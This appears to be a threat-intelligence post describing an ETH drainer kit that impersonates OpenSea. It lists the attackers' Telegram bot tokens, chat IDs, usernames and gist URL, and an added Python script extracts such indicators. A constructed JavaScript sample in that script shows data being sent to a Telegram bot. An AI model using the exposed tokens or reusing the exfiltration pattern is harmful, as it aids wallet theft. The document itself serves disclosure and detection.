First spotted by @ecarlesi: an ETH drainer impersonating OpenSea. Based on the drainer site's language, the malicious actor/s, as well as the targets, could be Dutch.
This drainer kit redirects you to a different website if:
- you did not use the correct path
- you have already connected to the website before (checked via storage objects)
It also includes a Telegram bot that alerts the malicious actor/s to movements in real time.
Telegram bot used:
5399326657:AAGOLtMLA7bMROzVUjeKDuR4GqrAblWbfXQ
username: metajsonuserrrs_bot
chat id: -709367678
title: MetaMaskActiveUsers
admin id: 2146370516
username: tanjrii
premium user
It also retrieves the same ETH wallet address from a GitHub gist: /gist.githubusercontent.com/ethereumjs-tx/020102e055e65567fe158f018fa226c6/raw/4171303cd239f36b6d4781d21786492de783ff9e/SIGN%2520ETH
The account was created recently:
/gist.github.com/ethereumjs-tx
The claim page uses a different Telegram bot from the one used by the document and index.
5538424823:AAHktsHcJOuPtDnjXy0jbWgFEMu2Hwgqq48
username: cryptofinechkd_bot
chat id: -1001599540988
title: cryptoWalletsTextFiles
/t.me/+Q7M498koivAyN2Nk
tanjrii is still the creator
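
An added triage example (not part of the original post, and not code from the kit): a small Python extractor that pulls Telegram bot tokens and chat IDs out of saved kit source and labels each chat ID by type, which is how the two bots above can be told apart (one posts to a basic group, the other to a supergroup or channel). The token pattern (numeric bot ID, colon, 35-character secret) is an assumption based on the two tokens shown on this page, and the sample JavaScript and its values are constructed.

```python
import re

# Assumed token shape, matching the tokens on this page:
# numeric bot ID, a colon, then a 35-character secret.
TOKEN_RE = re.compile(r"(?<!\d)(\d{8,10}):([A-Za-z0-9_-]{35})(?![\w-])")
# chat_id written as a JS/JSON property or a query-string parameter.
CHAT_RE = re.compile(r"chat_?id[\"']?\s*[:=]\s*[\"']?(-?\d{5,})", re.I)


def classify_chat(chat_id: int) -> str:
    """Map a Telegram Bot API chat ID to the kind of chat it denotes."""
    if chat_id > 0:
        return "private chat (user)"
    # Supergroups and channels are reported as -(10**12 + internal id).
    if chat_id <= -1_000_000_000_000:
        return "supergroup or channel"
    return "basic group"


def extract_telegram_iocs(source: str) -> dict:
    """Return bot tokens (with their bot IDs) and chat IDs found in source."""
    # The digits before the colon are the bot's own Telegram user ID.
    bots = {m.group(0): int(m.group(1)) for m in TOKEN_RE.finditer(source)}
    chats = {int(c): classify_chat(int(c)) for c in CHAT_RE.findall(source)}
    return {"bots": bots, "chats": chats}


# Constructed sample resembling exfiltration code in a drainer page.
SAMPLE_KIT_JS = '''
const tg = "https://api.telegram.org/bot1234567890:AAExampleExampleExampleExampleExamp/sendMessage";
fetch(tg + "?chat_id=-700000001&text=" + encodeURIComponent(msg));
const claim = { token: "1987654321:AA_constructed-token-for-testing-01", chat_id: "-1001500000000" };
'''

if __name__ == "__main__":
    result = extract_telegram_iocs(SAMPLE_KIT_JS)
    for token, bot_id in result["bots"].items():
        print(f"bot id {bot_id}  token {token}")
    for chat_id, kind in result["chats"].items():
        print(f"chat id {chat_id}  ({kind})")
```

Running it over each saved page of a kit separately shows when different pages report to different bots, as the claim page does here.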